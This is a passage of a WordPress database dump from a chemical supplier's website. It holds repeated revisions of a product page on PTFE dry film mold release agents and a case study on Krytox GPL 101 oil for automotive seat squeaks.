remains on the component does not allow paint or adhesives to bond with the component.  Free Silicone-based release agents will cause the surface of parts to seem oily or will "stain" the molded part. Silicone is difficult to remove from various material surfaces once it has become integrated into the mold part, and typically the part will scraped. The risk of operation contamination is also very high and free silicone can shut down a manufacturing paint shop fairly easily, causing production delays and incurring significant expense.</span>Miller-Stephenson has developed a robust portfolio of PTFE Dry Film release agents which circumvent all the drawbacks of silicone oil and wax-based release agents, while also increasing the application efficiency and cost-effectiveness. The use of silicone-free release agents allows for the removal of costly and time consuming cleaning steps and cross-contamination risk in the manufacturing process of many components, thus increasing productivity and lowering operational costs.\r\n\r\n[caption id="attachment_3028" align="alignleft" width="242"]<img class="wp-image-3028" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_360561536-800x534.jpg" alt="PTFE DryFilm Release Agent" width="242" height="161" /> MS-122SE is ideal for rubber-to-metal operations such as used on cockpit seals[/caption]\r\n\r\nOur PTFE Dry Film Mold Release Agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. Customers have found invaluable utility in utilizing Miller-Stephenson PTFE for electronic resin potting and casting operations.  <span style="font-size: 14.4px;">PTFE, in general  has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be <em>ineffective with injection molding operations.</em>  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s </span><strong style="font-size: 14.4px;"><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong><span style="font-size: 14.4px;"> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry. </span>To learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'PTFE Dry Film Mold Release Agents', '', 'inherit', 'closed', 'closed', '', '3015-revision-v1', '', '', '2016-11-15 16:51:19', '2016-11-15 16:51:19', '', 3015, 'https://www.miller-stephenson.com/3015-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3030, 3, '2016-11-15 16:51:54', '2016-11-15 16:51:54', '<h1 style="text-align: center;">PTFE Dry Film Mold Release Agents</h1>\r\n<h1 style="text-align: center;">Optimized surface adhesion; No Post-Molding cleaning</h1>\r\nPTFE (polytetrafluoroethylene) is a robust fluoropolymer which exhibits excellent chemical and thermal stability, high lubricity, low coefficient of friction, and functions as a premier mold release agent. Miller-Stephenson takes the application of PTFE Dry Film Mold Release Agents a step-further and utilizes a proprietary ultra-low molecular weight PTFE polymer to yield unsurpassed adhesion to mold surfaces, maximizing durability while minimizing coefficient of friction and transfer.   These attributes translate to the virtual elimination of mold part distortion - an extremely important criterion in precision molding. Our PTFE dry film release agents are not only ideal for mold release applications but also for dry lubricant operations. Benefits of Miller-Stephenson PTFE Dry Film Release agents:\r\n<ul>\r\n 	<li>Unparalleled release agent durability and surface adhesion</li>\r\n 	<li>No Transfer- Requires minimal post-molding cleaning</li>\r\n 	<li>Ideal for Rubber-to-Metal Bonding; Silicone molding</li>\r\n 	<li>Ideal for Compression / Transfer molding, Resin Casting and Potting;</li>\r\n 	<li>Excels at difficult mold geometries</li>\r\n 	<li>Stable up to 580 F / 304 C</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n 	<li>100% Non-flammable; Low VOC and GWP</li>\r\n</ul>\r\n<span style="font-size: 14.4px;">In comparison to typical release agents such as waxes and silicone oil-based release agents, PTFE minimize the need for post molding cleaning, allowing ancillary </span>processes<span style="font-size: 14.4px;"> such as painting, adhesives, etc to be done immediately. These post-molding processes are often not directly compatible with the use of a silicone or wax-based release agents. If the release agent contains free silicone, then painting or gluing the component directly after molding will not be possible because silicone residue that remains on the component does not allow paint or adhesives to bond with the component.  Free Silicone-based release agents will cause the surface of parts to seem oily or will "stain" the molded part. Silicone is difficult to remove from various material surfaces once it has become integrated into the mold part, and typically the part will scraped. The risk of operation contamination is also very high and free silicone can shut down a manufacturing paint shop fairly easily, causing production delays and incurring significant expense.</span>Miller-Stephenson has developed a robust portfolio of PTFE Dry Film release agents which circumvent all the drawbacks of silicone oil and wax-based release agents, while also increasing the application efficiency and cost-effectiveness. The use of silicone-free release agents allows for the removal of costly and time consuming cleaning steps and cross-contamination risk in the manufacturing process of many components, thus increasing productivity and lowering operational costs.\r\n\r\n[caption id="attachment_3028" align="alignleft" width="284"]<img class="wp-image-3028" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_360561536-800x534.jpg" alt="PTFE DryFilm Release Agent" width="284" height="190" /> <strong>MS-122SE is ideal for rubber-to-metal operations such as used on cockpit seals</strong>[/caption]\r\n\r\nOur PTFE Dry Film Mold Release Agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. Customers have found invaluable utility in utilizing Miller-Stephenson PTFE for electronic resin potting and casting operations.  <span style="font-size: 14.4px;">PTFE, in general  has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be <em>ineffective with injection molding operations.</em>  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s </span><strong style="font-size: 14.4px;"><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong><span style="font-size: 14.4px;"> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry. </span>To learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'PTFE Dry Film Mold Release Agents', '', 'inherit', 'closed', 'closed', '', '3015-revision-v1', '', '', '2016-11-15 16:51:54', '2016-11-15 16:51:54', '', 3015, 'https://www.miller-stephenson.com/3015-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3031, 3, '2016-11-15 16:53:05', '2016-11-15 16:53:05', '<h1 style="text-align: center;">PTFE Dry Film Mold Release Agents</h1>\r\n<h1 style="text-align: center;">Optimized surface adhesion; No Post-Molding cleaning</h1>\r\nPTFE (polytetrafluoroethylene) is a robust fluoropolymer which exhibits excellent chemical and thermal stability, high lubricity, low coefficient of friction, and functions as a premier mold release agent. Miller-Stephenson takes the application of PTFE Dry Film Mold Release Agents a step-further and utilizes a proprietary ultra-low molecular weight PTFE polymer to yield unsurpassed adhesion to mold surfaces, maximizing durability while minimizing coefficient of friction and transfer.   These attributes translate to the virtual elimination of mold part distortion - an extremely important criterion in precision molding. Our PTFE dry film release agents are not only ideal for mold release applications but also for dry lubricant operations. Benefits of Miller-Stephenson PTFE Dry Film Release agents:\r\n<ul>\r\n 	<li>Unparalleled release agent durability and surface adhesion</li>\r\n 	<li>No Transfer- Requires minimal post-molding cleaning</li>\r\n 	<li>Ideal for Rubber-to-Metal Bonding; Silicone molding</li>\r\n 	<li>Ideal for Compression / Transfer molding, Resin Casting and Potting;</li>\r\n 	<li>Excels at difficult mold geometries</li>\r\n 	<li>Stable up to 580 F / 304 C</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n 	<li>100% Non-flammable; Low VOC and GWP</li>\r\n</ul>\r\n<span style="font-size: 14.4px;">In comparison to typical release agents such as waxes and silicone oil-based release agents, PTFE minimize the need for post molding cleaning, allowing ancillary </span>processes<span style="font-size: 14.4px;"> such as painting, adhesives, etc to be done immediately. These post-molding processes are often not directly compatible with the use of a silicone or wax-based release agents. If the release agent contains free silicone, then painting or gluing the component directly after molding will not be possible because silicone residue that remains on the component does not allow paint or adhesives to bond with the component.  Free Silicone-based release agents will cause the surface of parts to seem oily or will "stain" the molded part. Silicone is difficult to remove from various material surfaces once it has become integrated into the mold part, and typically the part will scraped. The risk of operation contamination is also very high and free silicone can shut down a manufacturing paint shop fairly easily, causing production delays and incurring significant expense.</span>Miller-Stephenson has developed a robust portfolio of PTFE Dry Film release agents which circumvent all the drawbacks of silicone oil and wax-based release agents, while also increasing the application efficiency and cost-effectiveness. The use of silicone-free release agents allows for the removal of costly and time consuming cleaning steps and cross-contamination risk in the manufacturing process of many components, thus increasing productivity and lowering operational costs.\r\n\r\n[caption id="attachment_3028" align="alignleft" width="300"]<img class="wp-image-3028" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_360561536-800x534.jpg" alt="PTFE DryFilm Release Agent" width="300" height="200" /> <strong>MS-122SE is ideal for rubber-to-metal operations such as used on cockpit seals</strong>[/caption]\r\n\r\nOur PTFE Dry Film Mold Release Agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. Customers have found invaluable utility in utilizing Miller-Stephenson PTFE for electronic resin potting and casting operations.  <span style="font-size: 14.4px;">PTFE, in general  has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be <em>ineffective with injection molding operations.</em>  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s </span><strong style="font-size: 14.4px;"><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong><span style="font-size: 14.4px;"> are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry. </span>To learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'PTFE Dry Film Mold Release Agents', '', 'inherit', 'closed', 'closed', '', '3015-revision-v1', '', '', '2016-11-15 16:53:05', '2016-11-15 16:53:05', '', 3015, 'https://www.miller-stephenson.com/3015-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3032, 3, '2016-11-15 16:54:03', '2016-11-15 16:54:03', '<h1 style="text-align: center;">PTFE Dry Film Mold Release Agents</h1>\r\n<h1 style="text-align: center;">Optimized surface adhesion; No Post-Molding cleaning</h1>\r\nPTFE (polytetrafluoroethylene) is a robust fluoropolymer which exhibits excellent chemical and thermal stability, high lubricity, low coefficient of friction, and functions as a premier mold release agent. Miller-Stephenson takes the application of PTFE Dry Film Mold Release Agents a step-further and utilizes a proprietary ultra-low molecular weight PTFE polymer to yield unsurpassed adhesion to mold surfaces, maximizing durability while minimizing coefficient of friction and transfer.   These attributes translate to the virtual elimination of mold part distortion - an extremely important criterion in precision molding. Our PTFE dry film release agents are not only ideal for mold release applications but also for dry lubricant operations. Benefits of Miller-Stephenson PTFE Dry Film Release agents:\r\n<ul>\r\n 	<li>Unparalleled release agent durability and surface adhesion</li>\r\n 	<li>No Transfer- Requires minimal post-molding cleaning</li>\r\n 	<li>Ideal for Rubber-to-Metal Bonding; Silicone molding</li>\r\n 	<li>Ideal for Compression / Transfer molding, Resin Casting and Potting;</li>\r\n 	<li>Excels at difficult mold geometries</li>\r\n 	<li>Stable up to 580 F / 304 C</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n 	<li>100% Non-flammable; Low VOC and GWP</li>\r\n</ul>\r\nIn comparison to typical release agents such as waxes and silicone oil-based release agents, PTFE minimize the need for post molding cleaning, allowing ancillary processes such as painting, adhesives, etc to be done immediately. These post-molding processes are often not directly compatible with the use of a silicone or wax-based release agents. If the release agent contains free silicone, then painting or gluing the component directly after molding will not be possible because silicone residue that remains on the component does not allow paint or adhesives to bond with the component.  Free Silicone-based release agents will cause the surface of parts to seem oily or will "stain" the molded part. Silicone is difficult to remove from various material surfaces once it has become integrated into the mold part, and typically the part will scraped. The risk of operation contamination is also very high and free silicone can shut down a manufacturing paint shop fairly easily, causing production delays and incurring significant expense.Miller-Stephenson has developed a robust portfolio of PTFE Dry Film release agents which circumvent all the drawbacks of silicone oil and wax-based release agents, while also increasing the application efficiency and cost-effectiveness. The use of silicone-free release agents allows for the removal of costly and time consuming cleaning steps and cross-contamination risk in the manufacturing process of many components, thus increasing productivity and lowering operational costs.\r\n\r\n[caption id="attachment_3028" align="alignleft" width="300"]<img class="wp-image-3028" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_360561536-800x534.jpg" alt="PTFE DryFilm Release Agent" width="300" height="200" /> <strong>MS-122SE is ideal for rubber-to-metal operations such as used on cockpit seals</strong>[/caption]\r\n\r\nOur PTFE Dry Film Mold Release Agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. Customers have found invaluable utility in utilizing Miller-Stephenson PTFE for electronic resin potting and casting operations.  PTFE, in general  has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s <strong style="font-size: 14.4px;"><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong><span style="font-size: 14.4px;"> a</span>re formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry. To learn more about our mold release agents please <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'PTFE Dry Film Mold Release Agents', '', 'inherit', 'closed', 'closed', '', '3015-revision-v1', '', '', '2016-11-15 16:54:03', '2016-11-15 16:54:03', '', 3015, 'https://www.miller-stephenson.com/3015-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3033, 3, '2016-11-15 16:54:54', '2016-11-15 16:54:54', '<h1 style="text-align: center;">PTFE Dry Film Mold Release Agents</h1>\r\n<h1 style="text-align: center;">Optimized surface adhesion; No Post-Molding cleaning</h1>\r\nPTFE (polytetrafluoroethylene) is a robust fluoropolymer which exhibits excellent chemical and thermal stability, high lubricity, low coefficient of friction, and functions as a premier mold release agent. Miller-Stephenson takes the application of PTFE Dry Film Mold Release Agents a step-further and utilizes a proprietary ultra-low molecular weight PTFE polymer to yield unsurpassed adhesion to mold surfaces, maximizing durability while minimizing coefficient of friction and transfer.   These attributes translate to the virtual elimination of mold part distortion - an extremely important criterion in precision molding. Our PTFE dry film release agents are not only ideal for mold release applications but also for dry lubricant operations. Benefits of Miller-Stephenson PTFE Dry Film Release agents:\r\n<ul>\r\n 	<li>Unparalleled release agent durability and surface adhesion</li>\r\n 	<li>No Transfer- Requires minimal post-molding cleaning</li>\r\n 	<li>Ideal for Rubber-to-Metal Bonding; Silicone molding</li>\r\n 	<li>Ideal for Compression / Transfer molding, Resin Casting and Potting;</li>\r\n 	<li>Excels at difficult mold geometries</li>\r\n 	<li>Stable up to 580 F / 304 C</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n 	<li>100% Non-flammable; Low VOC and GWP</li>\r\n</ul>\r\nIn comparison to typical release agents such as waxes and silicone oil-based release agents, PTFE minimize the need for post molding cleaning, allowing ancillary processes such as painting, adhesives, etc to be done immediately. These post-molding processes are often not directly compatible with the use of a silicone or wax-based release agents. If the release agent contains free silicone, then painting or gluing the component directly after molding will not be possible because silicone residue that remains on the component does not allow paint or adhesives to bond with the component.  Free Silicone-based release agents will cause the surface of parts to seem oily or will "stain" the molded part. Silicone is difficult to remove from various material surfaces once it has become integrated into the mold part, and typically the part will scraped. The risk of operation contamination is also very high and free silicone can shut down a manufacturing paint shop fairly easily, causing production delays and incurring significant expense.Miller-Stephenson has developed a robust portfolio of PTFE Dry Film release agents which circumvent all the drawbacks of silicone oil and wax-based release agents, while also increasing the application efficiency and cost-effectiveness. The use of silicone-free release agents allows for the removal of costly and time consuming cleaning steps and cross-contamination risk in the manufacturing process of many components, thus increasing productivity and lowering operational costs.\r\n\r\n[caption id="attachment_3028" align="alignleft" width="300"]<img class="wp-image-3028" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_360561536-800x534.jpg" alt="PTFE DryFilm Release Agent" width="300" height="200" /> <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122SE</a> is ideal for rubber-to-metal operations such as used on cockpit seals</strong>[/caption]\r\n\r\nOur PTFE Dry Film Mold Release Agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. Customers have found invaluable utility in utilizing Miller-Stephenson PTFE for electronic resin potting and casting operations.  PTFE, in general  has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s <span style="font-size: 105%;"><strong style="font-size: 14.4px;"><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong></span><span style="font-size: 14.4px;"> a</span>re formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry. To learn more about our mold release agents please <span style="font-size: 105%;"><strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong></span>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'PTFE Dry Film Mold Release Agents', '', 'inherit', 'closed', 'closed', '', '3015-revision-v1', '', '', '2016-11-15 16:54:54', '2016-11-15 16:54:54', '', 3015, 'https://www.miller-stephenson.com/3015-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3034, 167, '2016-11-15 17:04:15', '2016-11-15 17:04:15', '', '', '', 'publish', 'closed', 'closed', '', '3034', '', '', '2016-11-15 17:04:16', '2016-11-15 17:04:16', '', 0, 'https://www.miller-stephenson.com/nf_sub/3034/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3035, 3, '2016-11-15 17:06:49', '2016-11-15 17:06:49', '<h1 style="text-align: center;">PTFE Dry Film Mold Release Agents</h1>\r\n<h1 style="text-align: center;">Optimized surface adhesion; No Post-Molding cleaning</h1>\r\nPTFE (polytetrafluoroethylene) is a robust fluoropolymer which exhibits excellent chemical and thermal stability, high lubricity, low coefficient of friction, and functions as a premier mold release agent. Miller-Stephenson takes the application of PTFE Dry Film Mold Release Agents a step-further and utilizes a proprietary ultra-low molecular weight PTFE polymer to yield unsurpassed adhesion to mold surfaces, maximizing durability while minimizing coefficient of friction and transfer.   These attributes translate to the virtual elimination of mold part distortion - an extremely important criterion in precision molding. Our PTFE dry film release agents are not only ideal for mold release applications but also for dry lubricant operations. Benefits of Miller-Stephenson PTFE Dry Film Release agents:\r\n<ul>\r\n 	<li>Unparalleled release agent durability and surface adhesion</li>\r\n 	<li>No Transfer- Requires minimal post-molding cleaning</li>\r\n 	<li>Ideal for Rubber-to-Metal Bonding; Silicone molding</li>\r\n 	<li>Ideal for Compression / Transfer molding, Resin Casting and Potting;</li>\r\n 	<li>Excels at difficult mold geometries</li>\r\n 	<li>Stable up to 580 F / 304 C</li>\r\n 	<li>Non-migrating; Non-staining</li>\r\n 	<li>100% Non-flammable; Low VOC and GWP</li>\r\n</ul>\r\nIn comparison to typical release agents such as waxes and silicone oil-based release agents, PTFE minimize the need for post molding cleaning, allowing ancillary processes such as painting, adhesives, etc to be done immediately. These post-molding processes are often not directly compatible with the use of a silicone or wax-based release agents. If the release agent contains free silicone, then painting or gluing the component directly after molding will not be possible because silicone residue that remains on the component does not allow paint or adhesives to bond with the component.  Free Silicone-based release agents will cause the surface of parts to seem oily or will "stain" the molded part. Silicone is difficult to remove from various material surfaces once it has become integrated into the mold part, and typically the part will scraped. The risk of operation contamination is also very high and free silicone can shut down a manufacturing paint shop fairly easily, causing production delays and incurring significant expense.Miller-Stephenson has developed a robust portfolio of PTFE Dry Film release agents which circumvent all the drawbacks of silicone oil and wax-based release agents, while also increasing the application efficiency and cost-effectiveness. The use of silicone-free release agents allows for the removal of costly and time consuming cleaning steps and cross-contamination risk in the manufacturing process of many components, thus increasing productivity and lowering operational costs.\r\n\r\n[caption id="attachment_3028" align="alignleft" width="300"]<img class="wp-image-3028" src="https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_360561536-800x534.jpg" alt="PTFE DryFilm Release Agent" width="300" height="200" /> <strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122SE</a> is ideal for rubber-to-metal operations such as used on cockpit seals</strong>[/caption]\r\n\r\nOur PTFE Dry Film Mold Release Agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of mold release agent can be solvent or water-based and application is typically performed with brushing or aerosolization. Once the solvent is dried, the release coating is ready for operation, no additional cure time is needed. PTFE dry film release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers. Customers have found invaluable utility in utilizing Miller-Stephenson PTFE for electronic resin potting and casting operations.  PTFE, in general  has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates.  PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson’s <span style="font-size: 105%;"><strong style="font-size: 14.4px;"><a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/">MS-122AV and MS-122SE</a></strong></span><span style="font-size: 14.4px;"> a</span>re formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry. To learn more about our mold release agents please <span style="font-size: 100%;"><strong><a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a></strong></span>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/troubleshooting-common-mold-release-issues/">For any questions about proper application of our mold release products please view our article which discusses this process</a></strong></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n&nbsp;', 'PTFE Dry Film Mold Release Agents', '', 'inherit', 'closed', 'closed', '', '3015-revision-v1', '', '', '2016-11-15 17:06:49', '2016-11-15 17:06:49', '', 3015, 'https://www.miller-stephenson.com/3015-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3036, 2, '2016-11-15 19:30:16', '2016-11-15 19:30:16', '<h1>Krytox Automotive Seat Lubrication</h1>\n<h2>A Brazilian supplier to the automotive industry improves customer and end-user satisfaction by using specialty lubricant.</h2>\n<h4>Automotive seat manufacturer in Brazil reduces squeaks</h4>\n<p>A Brazilian manufacturer of automotive seats for luxury vehicles wanted to reduce complaints about squeaks to improve satisfaction among its direct customers and the ultimate end users—the car owners. The goal was to eliminate recalls. <a href="https://www.miller-stephenson.com/product/krytox-gpl-101/">Krytox GPL 101</a> automotive seat lubrication</p>\n<h4>The Challenge</h4>\n<p>The area responsible for the annoying squeaks was the metal slides for the headrest. Typically, these slides are not lubricated. However, this manufacturer wanted to deliver the best product possible, exceeding customer expectations. The lubricant needed to be compatible with the metal slides, non-migratory, and easy to apply.</p>\n<h4>The Solution</h4>\n<p>Krytox™ GPL 101 oil from Chemours is an excellent lubricant that is compatible with all metals. It is easy to brush on to the clean metallic surface during the seat assembly process by using an applicator. What’s more,<br />\nbecause Krytox™ GPL 101 oil has low vapor pressure and surface energy, it stays exactly where it’s put.</p>\n<p>Key Advantages</p>\n<ul>\n<li>Using Krytox™ GPL 101 oil, the manufacturer was able to significantly reduce squeaks in automotive seats, improving customer satisfaction and reducing product recalls attributed to this annoying problem.</li>\n<li>Krytox™ GPL 101 oil provided excellent lubricity to the headrest slides and can also be used in many other automotive applications to reduce squeaks in vehicles ranging from luxury cars to light trucks.</li>\n</ul>\n[ux_product_categories ids="45" number="10"]', 'Krytox GPL 101 Automotive Seat Lubrication', '', 'publish', 'closed', 'closed', '', 'krytox-automotive-seat-lubrication', '', '', '2016-11-15 19:45:03', '2016-11-15 19:45:03', '', 0, 'https://www.miller-stephenson.com/?p=3036', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (3037, 2, '2016-11-15 19:11:35', '2016-11-15 19:11:35', '', 'Automotive Seat Lubrication', '', 'inherit', 'closed', 'closed', '', 'shutterstock_230790487', '', '', '2016-11-15 19:11:53', '2016-11-15 19:11:53', '', 3036, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_230790487.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3038, 2, '2016-11-15 19:30:16', '2016-11-15 19:30:16', '<h1>Krytox Automotive Seat Lubrication</h1>\r\n<h2>A Brazilian supplier to the automotive industry improves customer and end-user satisfaction by using specialty lubricant.</h2>\r\n<h4>Automotive seat manufacturer in Brazil reduces squeaks</h4>\r\nA Brazilian manufacturer of automotive seats for luxury vehicles wanted to reduce complaints about squeaks to improve satisfaction among its direct customers and the ultimate end users—the car owners. The goal was to eliminate recalls. <a href="https://www.miller-stephenson.com/product/krytox-gpl-101/">Krytox GPL 101</a> automotive seat lubrication\r\n<h4>The Challenge</h4>\r\nThe area responsible for the annoying squeaks was the metal slides for the headrest. Typically, these slides are not lubricated. However, this manufacturer wanted to deliver the best product possible, exceeding customer expectations. The lubricant needed to be compatible with the metal slides, non-migratory, and easy to apply.\r\n<h4>The Solution</h4>\r\nKrytox™ GPL 101 oil from Chemours is an excellent lubricant that is compatible with all metals. It is easy to brush on to the clean metallic surface during the seat assembly process by using an applicator. What’s more,\r\nbecause Krytox™ GPL 101 oil has low vapor pressure and surface energy, it stays exactly where it’s put.\r\n\r\nKey Advantages\r\n<ul>\r\n 	<li>Using Krytox™ GPL 101 oil, the manufacturer was able to significantly reduce squeaks in automotive seats, improving customer satisfaction and reducing product recalls attributed to this annoying problem.</li>\r\n 	<li>Krytox™ GPL 101 oil provided excellent lubricity to the headrest slides and can also be used in many other automotive applications to reduce squeaks in vehicles ranging from luxury cars to light trucks.</li>\r\n</ul>', 'Krytox GPL 101 Automotive Seat Lubrication', '', 'inherit', 'closed', 'closed', '', '3036-revision-v1', '', '', '2016-11-15 19:30:16', '2016-11-15 19:30:16', '', 3036, 'https://www.miller-stephenson.com/3036-revision-v1/', 0, 'revision', '', 0); 
